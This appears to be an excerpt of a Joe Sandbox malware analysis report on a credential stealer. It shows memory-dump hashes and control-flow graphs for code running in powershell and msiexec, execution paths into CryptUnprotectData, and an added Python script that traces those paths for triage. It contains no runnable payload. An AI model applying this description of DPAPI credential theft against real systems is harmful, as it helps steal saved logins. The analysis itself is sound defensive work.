• API ID:
• String ID: ,Szl$,Szl$p5jk$xSzl
• API String ID: 0-1021602235
• Opcode ID: aac0ce6875a3a9cdfd4296ebf84a002dbfe1307b9e6a89d942356a412b01576c
• Instruction ID: 5fc5b775548b54c48e9cd6ae1e99c04f0411f03d651eadcc96bbf44608bcc356
• Opcode Fuzzy Hash: aac0ce6875a3a9cdfd4296ebf84a002dbfe1307b9e6a89d942356a412b01576c
• Instruction Fuzzy Hash: D14148B1B1430ABFCB509BAC9401B6EBBE69FD6310F14827BD549DB351DA31E881C792

Strings
Memory Dump Source
• Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
Similarity
• API ID:
• String ID: $^q$$^q$$^q$$^q
• API String ID: 0-2125118731
• Opcode ID: ce41a4c917782df3517b3df22e0a524e8716c4fb19c061141d9144308734ed14
• Instruction ID: 471888ff86c6ebc8f025257ce2f680732fb9326fbafa406a26f15bee7419a619
• Opcode Fuzzy Hash: ce41a4c917782df3517b3df22e0a524e8716c4fb19c061141d9144308734ed14
• Instruction Fuzzy Hash: 0E216BF171030A7BDB7899AA5C05B2BF6DA5BC2710F24853AE405CF395DD35C8458360

Strings
Memory Dump Source
• Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$$^q$$^q
• API String ID: 0-2049395529
• Opcode ID: 3fd569fc9415f2fa62beb80dbd8564cf539242725cc065b73032b3f58e13cc27
• Instruction ID: 621861820739bd51d9c3e8d52e752e43a5977bf4ecb3cff6121615a43b628bd4
• Opcode Fuzzy Hash: 3fd569fc9415f2fa62beb80dbd8564cf539242725cc065b73032b3f58e13cc27
• Instruction Fuzzy Hash: F3017C62A4A3CA9FC71B57B818201197FF69E9395072A41EBC081DF367DE158C4AC7A3

Execution Graph

Execution Coverage: 8.8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 21.2%
Total number of Nodes: 33
Total number of Limit Nodes: 2

execution_graph nodes (id, address, API label where the report attaches one):
26429 307e018
26430 307e024
26434 24017b69
26438 24017b78
26431 307e1d4
26436 24017b70
26435 24018029
26442 24018431
26440 24017b9a
26439 24018029
26441 24018431 CryptUnprotectData
26443 24018440
26447 24018a59
26455 24018a68
26444 240184b0
26448 24018a8d
26449 24018b41
26452 24018a59 CryptUnprotectData
26453 24018a68 CryptUnprotectData
26463 24018c4a
26467 240187a8
26456 24018a8d
26459 24018b41
26460 24018a59 CryptUnprotectData
26461 24018a68 CryptUnprotectData
26462 24018c4a CryptUnprotectData
26457 240187a8 CryptUnprotectData
26458 24018d0d
26464 24018c5d
26465 240187a8 CryptUnprotectData
26466 24018d0d
26468 24018ef8 CryptUnprotectData
26469 24018d0d

execution_graph edges (id->id):
26429->26430 26430->26434 26430->26438 26434->26436 26435->26431 26436->26435 26436->26442 26438->26440 26439->26431 26440->26439 26440->26441 26441->26440 26442->26443 26443->26447 26443->26455 26444->26436 26447->26448 26447->26449 26448->26449 26448->26452 26448->26453 26448->26463 26449->26467 26452->26449 26453->26449 26455->26456 26455->26459 26456->26459 26456->26460 26456->26461 26456->26462 26457->26458 26458->26444 26459->26457 26460->26459 26461->26459 26462->26459 26463->26464 26464->26465 26465->26466 26466->26449 26467->26468 26468->26469 26469->26444
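The execution graph above is the report's own data, flattened into one token stream. The Python below is an added example written for this page, not Joe Sandbox code: it parses that stream back into blocks and edges and answers the question an analyst actually has about it, namely which blocks end in CryptUnprotectData (the DPAPI decryption call a stealer uses to recover saved browser and mail credentials), which blocks branch into them, and how execution reaches the first one from the entry block. The token layout (block id, address, optional API label; `a->b` edges) is inferred from the dump and is an assumption; the same reader accepts the control_flow_graph dumps in the function records, including their `call <addr>` labels. The names `EXECUTION_GRAPH`, `parse_graph`, `shortest_path`, `reachable` and `trace_api` are this example's own; the graph text is copied verbatim from the section above and the code needs only the standard library.

```python
"""Reconstruct call paths from a Joe Sandbox execution_graph dump (added example).

Token layout, inferred from the report text and not documented by Joe Sandbox:
"<id> <address> [<label> ...]" declares a block, the label being an API name such
as CryptUnprotectData or, in control_flow_graph dumps, "call <addr>"; "<a>-><b>"
is a directed edge between block ids."""
import re
from collections import deque

# Edge list copied verbatim from the report's Execution Graph section.
EXECUTION_GRAPH = (
    "execution_graph 26429 307e018 26430 307e024 26429->26430 26434 24017b69 26430->26434 26438 24017b78 "
    "26430->26438 26431 307e1d4 26436 24017b70 26434->26436 26435 24018029 26435->26431 26436->26435 "
    "26442 24018431 26436->26442 26440 24017b9a 26438->26440 26439 24018029 26439->26431 26440->26439 "
    "26441 24018431 CryptUnprotectData 26440->26441 26441->26440 26443 24018440 26442->26443 "
    "26447 24018a59 26443->26447 26455 24018a68 26443->26455 26444 240184b0 26444->26436 26448 24018a8d "
    "26447->26448 26449 24018b41 26447->26449 26448->26449 26452 24018a59 CryptUnprotectData 26448->26452 "
    "26453 24018a68 CryptUnprotectData 26448->26453 26463 24018c4a 26448->26463 26467 240187a8 26449->26467 "
    "26452->26449 26453->26449 26456 24018a8d 26455->26456 26459 24018b41 26455->26459 26456->26459 "
    "26460 24018a59 CryptUnprotectData 26456->26460 26461 24018a68 CryptUnprotectData 26456->26461 "
    "26462 24018c4a CryptUnprotectData 26456->26462 26457 240187a8 CryptUnprotectData 26458 24018d0d "
    "26457->26458 26458->26444 26459->26457 26460->26459 26461->26459 26462->26459 26464 24018c5d "
    "26463->26464 26465 240187a8 CryptUnprotectData 26464->26465 26466 24018d0d 26465->26466 26466->26449 "
    "26468 24018ef8 CryptUnprotectData 26467->26468 26469 24018d0d 26468->26469 26469->26444"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")


def parse_graph(text):
    """Return (nodes, edges): id -> (address, label or None) and id -> successor ids."""
    tokens = text.split()
    if tokens and tokens[0] in ("execution_graph", "control_flow_graph"):
        tokens = tokens[1:]
    nodes, edges, i = {}, {}, 0
    while i < len(tokens):
        m = EDGE_RE.match(tokens[i])
        if m:
            edges.setdefault(int(m.group(1)), []).append(int(m.group(2)))
            i += 1
            continue
        node_id, addr = int(tokens[i]), tokens[i + 1]
        i += 2
        label = []
        # The label runs until the next edge or the next block id.  A decimal-only
        # token directly after "call" is that call's target address, not a new id
        # (the control_flow_graph dumps contain e.g. "call 3075658").
        while i < len(tokens) and not EDGE_RE.match(tokens[i]):
            if tokens[i].isdigit() and (not label or label[-1] != "call"):
                break
            label.append(tokens[i])
            i += 1
        nodes[node_id] = (addr, " ".join(label) or None)
    return nodes, edges


def reachable(edges, start):
    """All block ids reachable from start (depth-first walk)."""
    seen, stack = {start}, [start]
    while stack:
        for nxt in edges.get(stack.pop(), []):
            if nxt not in seen:
                seen.add(nxt)
                stack.append(nxt)
    return seen


def shortest_path(edges, start, goals):
    """Breadth-first search; the first path from start into goals, as block ids."""
    prev, queue = {start: None}, deque([start])
    while queue:
        cur = queue.popleft()
        if cur in goals:
            path = []
            while cur is not None:
                path.append(cur)
                cur = prev[cur]
            return path[::-1]
        for nxt in edges.get(cur, []):
            if nxt not in prev:
                prev[nxt] = cur
                queue.append(nxt)
    return None


def trace_api(text, api="CryptUnprotectData"):
    """Where `api` sits in the graph: entry block, blocks labelled with it, the
    blocks that branch into those, and the shortest path from the entry to one."""
    nodes, edges = parse_graph(text)
    targets = {d for dsts in edges.values() for d in dsts}
    # Entry = the block nothing jumps to; fall back to the first declared block
    # for a graph that is one big loop (some control_flow_graph dumps are).
    entry = next((n for n in nodes if n not in targets), next(iter(nodes)))
    hits = {n for n, (_, label) in nodes.items() if label == api}
    path = shortest_path(edges, entry, hits) or []
    return {
        "node_count": len(nodes),
        "entry": nodes[entry][0],
        "api_addresses": sorted({nodes[n][0] for n in hits}),
        "call_sites": sorted({nodes[s][0] for s, dsts in edges.items()
                              for d in dsts if d in hits}),
        "unreachable": sorted(set(nodes) - reachable(edges, entry)),
        "path": [nodes[n][0] for n in path],
    }


if __name__ == "__main__":
    for key, value in trace_api(EXECUTION_GRAPH).items():
        print(f"{key}: {value}")
```

Run as a script it prints the summary for this sample: 33 blocks, all reachable from the entry block 307e018 (in the 03070000 region), six distinct blocks labelled CryptUnprotectData, all at 0x2401xxxx and therefore outside that region, five blocks that branch into them, and the shortest route 307e018, 307e024, 24017b78, 24017b9a, 24018431. For triage that is the useful reading of the graph: a block in the injected msiexec region hands off almost immediately to code elsewhere that does nothing but DPAPI decryption, which is the credential-theft stage rather than the loader.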

Control-flow Graph

control_flow_graph 108 30729ec-30729f6 110 3072981-3072990 108->110 111 30729f8-3072a3b 108->111 113 3072997-30729c8 110->113 116 3072a5d-3072aac 111->116 117 3072a3d-3072a5c 111->117 122 3072ac7-3072acf 116->122 123 3072aae-3072ab5 116->123 126 3072ad2-3072ae6 122->126 124 3072ab7-3072abc 123->124 125 3072abe-3072ac5 123->125 124->126 125->126 129 3072afc-3072b04 126->129 130 3072ae8-3072aef 126->130 133 3072b06-3072b0a 129->133 131 3072af5-3072afa 130->131 132 3072af1-3072af3 130->132 131->133 132->133 135 3072b0c-3072b21 133->135 136 3072b6a-3072b6d 133->136 135->136 142 3072b23-3072b26 135->142 137 3072bb5-3072bbb 136->137 138 3072b6f-3072b84 136->138 140 30736b6 137->140 141 3072bc1-3072bc3 137->141 138->137 145 3072b86-3072b8a 138->145 148 30736bb-3073ca5 140->148 141->140 143 3072bc9-3072bce 141->143 146 3072b45-3072b63 call 30702c8 142->146 147 3072b28-3072b2a 142->147 149 3073664-3073668 143->149 150 3072bd4 143->150 151 3072b92-3072bb0 call 30702c8 145->151 152 3072b8c-3072b90 145->152 146->136 147->146 153 3072b2c-3072b2f 147->153 155 307366f-30736b5 149->155 156 307366a-307366d 149->156 150->149 151->137 152->137 152->151 153->136 158 3072b31-3072b43 153->158 156->148 156->155 158->136 158->146
Strings
Memory Dump Source
• Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
Similarity
• API ID:
• String ID: Xbq$Xbq$Xbq$Xbq
• API String ID: 0-2732225958
• Opcode ID: 8fbdc2edc8914fc53a19bd0cd429e824c68210725d34593e5f6ca3cfdc9de2c6
• Instruction ID: c8cd5e51ac8d6471821bc76e8ec5b3fc1149121745b87010cd742729cfc6c74a
• Opcode Fuzzy Hash: 8fbdc2edc8914fc53a19bd0cd429e824c68210725d34593e5f6ca3cfdc9de2c6
• Instruction Fuzzy Hash: 23426032806756CBCB15CF38CC4529ABFB1EF46224B2D4596C4998B607E739B730CB96

Control-flow Graph

control_flow_graph 278 307c468-307c471 279 307c473-307c498 278->279 280 307c3fc-307c414 278->280 281 307c49f-307c4e7 279->281 282 307c49a 279->282 280->278 287 307c4ef-307c4fe call 30741a0 281->287 282->281 290 307c503-307c57c call 3073cc0 287->290 296 307c583-307c5a4 call 3075658 290->296 297 307c57e 290->297 299 307c5a9-307c5b4 296->299 297->296 300 307c5b6 299->300 301 307c5bb-307c5bf 299->301 300->301 302 307c5c4-307c5cb 301->302 303 307c5c1-307c5c2 301->303 305 307c5d2-307c5e0 302->305 306 307c5cd 302->306 304 307c5e3-307c627 303->304 310 307c68d-307c6a4 304->310 305->304 306->305 312 307c6a6-307c6cb 310->312 313 307c629-307c63f 310->313 320 307c6e3 312->320 321 307c6cd-307c6e2 312->321 317 307c641-307c64d 313->317 318 307c669 313->318 322 307c657-307c65d 317->322 323 307c64f-307c655 317->323 319 307c66f-307c68c 318->319 319->310 321->320 324 307c667 322->324 323->324 324->319
Strings
Memory Dump Source
• Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
Similarity
• API ID:
• String ID: PH^q$PH^q$PH^q
• API String ID: 0-70248665
• Opcode ID: c361799260d718b010f8dc48d5a8057fb562afe472df30b67972d6e182e7b578
• Instruction ID: 2bdd4727ff410ae413bdde398bb38592c8b6d93ed8f609e3881c18bd2dd799a3
• Opcode Fuzzy Hash: c361799260d718b010f8dc48d5a8057fb562afe472df30b67972d6e182e7b578
• Instruction Fuzzy Hash: 3291E674E01208CFEB14DFAAD884A9DFBF2BF89300F149069D819AB364DB349985CF54

Strings
Memory Dump Source
• Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
Similarity
• API ID:
• String ID: K
• API String ID: 0-856455061
• Opcode ID: d5d6cc720692c38b0c263582897e5ed9c808249db26266bd3c9cd92ed064bc68
• Instruction ID: 292dcc6f43898397802540e500326337313abff5dfa339841ffaf3e12c7ad454
• Opcode Fuzzy Hash: d5d6cc720692c38b0c263582897e5ed9c808249db26266bd3c9cd92ed064bc68
• Instruction Fuzzy Hash: 1233F571D146198EDB51EF68C854A9DFBB1FF99300F10D69AE4487B221EB70AAC4CF81

Control-flow Graph

control_flow_graph 764 3073e09-3073e25 765 3073e27-3073e29 764->765 766 3073e2e-3073e3e 764->766 767 30740cc-30740d3 765->767 768 3073e45-3073e55 766->768 769 3073e40 766->769 771 30740b3-30740c1 768->771 772 3073e5b-3073e69 768->772 769->767 775 30740d4-30741ba 771->775 777 30740c3-30740c7 call 30702c8 771->777 772->775 776 3073e6f 772->776 846 30741c1-3074274 call 3072358 call 3072368 call 3072378 call 3072388 775->846 847 30741bc 775->847 776->775 778 3074067-3074082 call 30702d8 776->778 779 30740a7-30740b1 776->779 780 3073f26-3073f47 776->780 781 3074084-30740a5 call 30728f0 776->781 782 3073f00-3073f21 776->782 783 307400e-3074034 776->783 784 3073e8d-3073eae 776->784 785 3073f4c-3073f6d 776->785 786 3073fcc-3074009 776->786 787 3073e76-3073e88 776->787 788 3073eb3-3073ed5 776->788 789 3073f72-3073f9a 776->789 790 3073f9f-3073fc7 776->790 791 3073eda-3073efb 776->791 792 3074039-3074065 776->792 777->767 778->767 779->767 780->767 781->767 782->767 783->767 784->767 785->767 786->767 787->767 788->767 789->767 790->767 791->767 792->767 860 3074279-307435f call 30702e4 846->860 847->846
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: Xbq$$^q
                                                                                                                                                                                    • API String ID: 0-1593437937
                                                                                                                                                                                    • Opcode ID: 5cf7544cfa50999c8ac2dfcf7e5a93eb2352e3177379f862b4a61fd348e992b3
                                                                                                                                                                                    • Instruction ID: bb5f275e6134534df0bfaa0223f6a65a9ecc296ff296ffa64b2c4980a88303fc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cf7544cfa50999c8ac2dfcf7e5a93eb2352e3177379f862b4a61fd348e992b3
                                                                                                                                                                                    • Instruction Fuzzy Hash: CCF15074F01218DFDB08DFB9D4945AEBBB2FF88310B148569D406AB358DF359902CB99

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 959 307c147-307c158 960 307c184 959->960 961 307c15a-307c172 959->961 962 307c186-307c18a 960->962 965 307c174-307c179 961->965 966 307c17b-307c17e 961->966 965->962 967 307c180-307c182 966->967 968 307c18b-307c199 966->968 967->960 967->961 970 307c124-307c127 968->970 971 307c19b-307c19d 968->971 973 307c128-307c129 970->973 972 307c19f-307c1a1 971->972 971->973 974 307c1a3-307c1c8 972->974 975 307c12c-307c145 972->975 976 307c1cf-307c2ac call 30741a0 call 3073cc0 974->976 977 307c1ca 974->977 989 307c2b3-307c2e4 call 3075658 976->989 990 307c2ae 976->990 977->976 993 307c2e6 989->993 994 307c2eb-307c2ef 989->994 990->989 993->994 995 307c2f4-307c2fb 994->995 996 307c2f1-307c2f2 994->996 998 307c302-307c310 995->998 999 307c2fd 995->999 997 307c313-307c357 996->997 1003 307c3bd-307c3d4 997->1003 998->997 999->998 1005 307c3d6-307c3fb 1003->1005 1006 307c359-307c36f 1003->1006 1013 307c413-307c471 1005->1013 1014 307c3fd-307c400 1005->1014 1010 307c371-307c37d 1006->1010 1011 307c399 1006->1011 1015 307c387-307c38d 1010->1015 1016 307c37f-307c385 1010->1016 1012 307c39f-307c3bc 1011->1012 1012->1003 1023 307c473-307c498 1013->1023 1024 307c3fc-307c400 1013->1024 1018 307c40a-307c412 1014->1018 1017 307c397 1015->1017 1016->1017 1017->1012 1018->1013 1025 307c49f-307c57c call 30741a0 call 3073cc0 1023->1025 1026 307c49a 1023->1026 1024->1018 1036 307c583-307c5a4 call 3075658 1025->1036 1037 307c57e 1025->1037 1026->1025 1039 307c5a9-307c5b4 1036->1039 1037->1036 1040 307c5b6 1039->1040 1041 307c5bb-307c5bf 1039->1041 1040->1041 1042 307c5c4-307c5cb 1041->1042 1043 307c5c1-307c5c2 1041->1043 1045 307c5d2-307c5e0 1042->1045 1046 307c5cd 1042->1046 1044 307c5e3-307c627 1043->1044 1050 307c68d-307c6a4 1044->1050 1045->1044 1046->1045 1052 307c6a6-307c6cb 1050->1052 1053 307c629-307c63f 1050->1053 1060 307c6e3 1052->1060 1061 307c6cd-307c6e2 1052->1061 1057 307c641-307c64d 1053->1057 1058 307c669 1053->1058 1062 307c657-307c65d 1057->1062 1063 307c64f-307c655 1057->1063 1059 307c66f-307c68c 1058->1059 1059->1050 1061->1060 1064 307c667 1062->1064 1063->1064 1064->1059
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                                                    • Opcode ID: d8bc28f17c14a746be38a58b5c93f813c2b1fbc618223088d780f74a864bd498
                                                                                                                                                                                    • Instruction ID: 77f187aadece1836ef82e4daad68f55a1742b6d79ab6a1f18607cfd81f33b227
                                                                                                                                                                                    • Opcode Fuzzy Hash: d8bc28f17c14a746be38a58b5c93f813c2b1fbc618223088d780f74a864bd498
                                                                                                                                                                                    • Instruction Fuzzy Hash: ECA10974E01218DFEB14DFAAD884A9DFBF2BF89310F14806AE409AB365DB349845CF54

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1209 3075362-30753a0 1210 30753a7-3075484 call 30741a0 call 3073cc0 1209->1210 1211 30753a2 1209->1211 1221 3075486 1210->1221 1222 307548b-30754a9 1210->1222 1211->1210 1221->1222 1252 30754ac call 3075649 1222->1252 1253 30754ac call 3075658 1222->1253 1223 30754b2-30754bd 1224 30754c4-30754c8 1223->1224 1225 30754bf 1223->1225 1226 30754cd-30754d4 1224->1226 1227 30754ca-30754cb 1224->1227 1225->1224 1229 30754d6 1226->1229 1230 30754db-30754e9 1226->1230 1228 30754ec-3075530 1227->1228 1234 3075596-30755ad 1228->1234 1229->1230 1230->1228 1236 3075532-3075548 1234->1236 1237 30755af-30755d4 1234->1237 1240 3075572 1236->1240 1241 307554a-3075556 1236->1241 1243 30755d6-30755eb 1237->1243 1244 30755ec 1237->1244 1247 3075578-3075595 1240->1247 1245 3075560-3075566 1241->1245 1246 3075558-307555e 1241->1246 1243->1244 1248 3075570 1245->1248 1246->1248 1247->1234 1248->1247 1252->1223 1253->1223
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                                                    • Opcode ID: f37251a24f45765c47ec31e5748a0ef8a3f7dd46a36f35a5d3ee6415bdcbde8c
                                                                                                                                                                                    • Instruction ID: 3d146183266c2dca0ad106f34ada7d8ed035d9ff3a4fed339b57588d65d31bd2
                                                                                                                                                                                    • Opcode Fuzzy Hash: f37251a24f45765c47ec31e5748a0ef8a3f7dd46a36f35a5d3ee6415bdcbde8c
                                                                                                                                                                                    • Instruction Fuzzy Hash: CF91E474E01218CFDB14CFAAD994ADDBBF2BF89300F14806AE808AB365DB349945CF54

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1254 307ca08-307ca38 1256 307ca3f-307cb1c call 30741a0 call 3073cc0 1254->1256 1257 307ca3a 1254->1257 1267 307cb23-307cb44 call 3075658 1256->1267 1268 307cb1e 1256->1268 1257->1256 1270 307cb49-307cb54 1267->1270 1268->1267 1271 307cb56 1270->1271 1272 307cb5b-307cb5f 1270->1272 1271->1272 1273 307cb64-307cb6b 1272->1273 1274 307cb61-307cb62 1272->1274 1276 307cb72-307cb80 1273->1276 1277 307cb6d 1273->1277 1275 307cb83-307cbc7 1274->1275 1281 307cc2d-307cc44 1275->1281 1276->1275 1277->1276 1283 307cc46-307cc6b 1281->1283 1284 307cbc9-307cbdf 1281->1284 1291 307cc83 1283->1291 1292 307cc6d-307cc82 1283->1292 1288 307cbe1-307cbed 1284->1288 1289 307cc09 1284->1289 1293 307cbf7-307cbfd 1288->1293 1294 307cbef-307cbf5 1288->1294 1290 307cc0f-307cc2c 1289->1290 1290->1281 1292->1291 1295 307cc07 1293->1295 1294->1295 1295->1290
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                                                    • Opcode ID: 8c3a7d265ca86b2195a1e261ed506baad3ea32e4bee3c4b8d792a866d4c8b8c7
                                                                                                                                                                                    • Instruction ID: e7f2ac0a3354ee1537ac9906d4d6714246a4071b7359f1c34498e2aaeb7846a1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c3a7d265ca86b2195a1e261ed506baad3ea32e4bee3c4b8d792a866d4c8b8c7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1181B374E01218CFEB54DFAAD894A9DBBF2BF89300F14C069E818AB365DB349945CF54

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1343 307d278-307d2a8 1344 307d2af-307d38c call 30741a0 call 3073cc0 1343->1344 1345 307d2aa 1343->1345 1355 307d393-307d3b4 call 3075658 1344->1355 1356 307d38e 1344->1356 1345->1344 1358 307d3b9-307d3c4 1355->1358 1356->1355 1359 307d3c6 1358->1359 1360 307d3cb-307d3cf 1358->1360 1359->1360 1361 307d3d4-307d3db 1360->1361 1362 307d3d1-307d3d2 1360->1362 1364 307d3e2-307d3f0 1361->1364 1365 307d3dd 1361->1365 1363 307d3f3-307d437 1362->1363 1369 307d49d-307d4b4 1363->1369 1364->1363 1365->1364 1371 307d4b6-307d4db 1369->1371 1372 307d439-307d44f 1369->1372 1379 307d4f3 1371->1379 1380 307d4dd-307d4f2 1371->1380 1376 307d451-307d45d 1372->1376 1377 307d479 1372->1377 1381 307d467-307d46d 1376->1381 1382 307d45f-307d465 1376->1382 1378 307d47f-307d49c 1377->1378 1378->1369 1380->1379 1383 307d477 1381->1383 1382->1383 1383->1378
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                                                    • Opcode ID: 809074203c85f6e709b8b997648f202fae6327ea0aa4520d10d342447f6d11db
                                                                                                                                                                                    • Instruction ID: 9f1f04fdf968ec3eb49c11106550d0e31ff640d9b55d1f6b5c42286a1fab2269
                                                                                                                                                                                    • Opcode Fuzzy Hash: 809074203c85f6e709b8b997648f202fae6327ea0aa4520d10d342447f6d11db
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3481C374E01218CFDB54DFAAD884A9DFBF2BF89300F148069E808AB365DB349945CF54

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1299 307ccd8-307cd08 1300 307cd0f-307cdec call 30741a0 call 3073cc0 1299->1300 1301 307cd0a 1299->1301 1311 307cdf3-307ce14 call 3075658 1300->1311 1312 307cdee 1300->1312 1301->1300 1314 307ce19-307ce24 1311->1314 1312->1311 1315 307ce26 1314->1315 1316 307ce2b-307ce2f 1314->1316 1315->1316 1317 307ce34-307ce3b 1316->1317 1318 307ce31-307ce32 1316->1318 1320 307ce42-307ce50 1317->1320 1321 307ce3d 1317->1321 1319 307ce53-307ce97 1318->1319 1325 307cefd-307cf14 1319->1325 1320->1319 1321->1320 1327 307cf16-307cf3b 1325->1327 1328 307ce99-307ceaf 1325->1328 1334 307cf53 1327->1334 1335 307cf3d-307cf52 1327->1335 1332 307ceb1-307cebd 1328->1332 1333 307ced9 1328->1333 1336 307cec7-307cecd 1332->1336 1337 307cebf-307cec5 1332->1337 1338 307cedf-307cefc 1333->1338 1335->1334 1339 307ced7 1336->1339 1337->1339 1338->1325 1339->1338
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                                                    • Opcode ID: 919e4f83f014600cb53fde3d6a1b061c3093e4c5dfa01803efb540383afdbea2
                                                                                                                                                                                    • Instruction ID: f9b7acd93c3dfcf6c9b1385cf99910a73422761ae48cb119f5fb77e8eed3e68d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 919e4f83f014600cb53fde3d6a1b061c3093e4c5dfa01803efb540383afdbea2
                                                                                                                                                                                    • Instruction Fuzzy Hash: CE81C574E01208CFEB54DFAAD984A9DBBF2BF89300F14C069E419AB365DB349945CF54

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1387 307cfac-307cfd8 1388 307cfdf-307d0bc call 30741a0 call 3073cc0 1387->1388 1389 307cfda 1387->1389 1399 307d0c3-307d0e4 call 3075658 1388->1399 1400 307d0be 1388->1400 1389->1388 1402 307d0e9-307d0f4 1399->1402 1400->1399 1403 307d0f6 1402->1403 1404 307d0fb-307d0ff 1402->1404 1403->1404 1405 307d104-307d10b 1404->1405 1406 307d101-307d102 1404->1406 1408 307d112-307d120 1405->1408 1409 307d10d 1405->1409 1407 307d123-307d167 1406->1407 1413 307d1cd-307d1e4 1407->1413 1408->1407 1409->1408 1415 307d1e6-307d20b 1413->1415 1416 307d169-307d17f 1413->1416 1422 307d223 1415->1422 1423 307d20d-307d222 1415->1423 1419 307d181-307d18d 1416->1419 1420 307d1a9 1416->1420 1424 307d197-307d19d 1419->1424 1425 307d18f-307d195 1419->1425 1426 307d1af-307d1cc 1420->1426 1423->1422 1427 307d1a7 1424->1427 1425->1427 1426->1413 1427->1426
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
